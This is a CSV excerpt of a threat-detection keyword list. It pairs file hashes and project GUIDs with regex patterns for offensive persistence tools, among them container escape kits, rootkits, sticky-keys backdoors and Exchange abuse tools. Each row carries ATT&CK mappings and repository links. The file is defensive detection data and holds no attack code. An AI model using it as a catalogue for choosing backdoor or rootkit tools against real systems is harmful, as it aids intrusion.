"*8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389*",".{0,1000}8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105*",".{0,1000}8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*",".{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","#filehash","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z"
"*8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec*",".{0,1000}8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*",".{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*",".{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8*",".{0,1000}9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*",".{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704*",".{0,1000}91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e*",".{0,1000}924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8*",".{0,1000}9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*",".{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c*",".{0,1000}9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97*",".{0,1000}954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*",".{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb*",".{0,1000}96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696*",".{0,1000}974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc*",".{0,1000}9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d*",".{0,1000}99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4*",".{0,1000}9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70*",".{0,1000}9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74*",".{0,1000}9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b*",".{0,1000}9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a*",".{0,1000}9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e*",".{0,1000}9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230*",".{0,1000}9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*",".{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#GUIDproject","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04*",".{0,1000}9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e*",".{0,1000}9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be*",".{0,1000}9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82*",".{0,1000}9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77*",".{0,1000}9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*",".{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e*",".{0,1000}9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f*",".{0,1000}9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf*",".{0,1000}9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*",".{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","#GUIDproject","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9*",".{0,1000}a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*",".{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*",".{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#GUIDproject","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87*",".{0,1000}a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d*",".{0,1000}a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795*",".{0,1000}a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325*",".{0,1000}a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1*",".{0,1000}a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe*",".{0,1000}a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4*",".{0,1000}a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9*",".{0,1000}a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455*",".{0,1000}a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c*",".{0,1000}a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7*",".{0,1000}a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*",".{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498*",".{0,1000}a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*aa142160446a919eaba99ce15992f6e11b1fdaa7a9f569979a29068120f774cf*",".{0,1000}aa142160446a919eaba99ce15992f6e11b1fdaa7a9f569979a29068120f774cf.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","#filehash","N/A","7","7","N/A","N/A","N/A","N/A"
"*aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f*",".{0,1000}aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
